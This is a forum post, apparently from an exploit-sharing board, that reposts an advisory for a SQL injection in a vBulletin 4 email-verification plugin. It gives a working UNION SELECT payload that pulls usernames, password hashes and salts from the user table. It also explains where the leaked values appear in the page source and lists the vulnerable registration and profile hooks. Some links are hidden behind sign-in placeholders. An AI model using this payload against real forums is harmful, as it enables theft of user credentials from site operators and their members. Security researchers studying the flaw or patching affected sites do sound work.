dEEpEst Posted December 17, 2014 Share Posted December 17, 2014 [HIDE-THANKS]#Title: vBulletin Verify Email Before Registration Plugin - SQL Injection #Date: September 19 2014 #Version: Any vBulletin 4.*.* version which has the plugin installed. #Plugin: This is the hidden content, please Sign In or Sign Up #Author: Dave (FW/FG) The vulnerability resides in the register_form_complete hook, and some other hooks. The POST/GET data is not sanitized before being used in queries. SQL injection at: This is the hidden content, please Sign In or Sign Up [sqli] PoC: This is the hidden content, please Sign In or Sign Up UNION SELECT null, concat(username,0x3a,password,0x3a,salt), null, null, null, null FROM user WHERE userid = '1 Now look at the source of the page and find: maxlength="50" value="[DATA IS HERE]" dir="ltr" tabindex="1"> maxlength="50" value="[DATA IS HERE]" dir="ltr" tabindex="1"> Vulnerable hooks: profile_updatepassword_complete (Email field when you want to change your email address after being logged in.) register_addmember_complete (After submitting the final registration form.) register_addmember_process register_form_complete (This example) register_start (Email confirmation form at register.php)[/HIDE-THANKS] Link to comment Share on other sites More sharing options...
Recommended Posts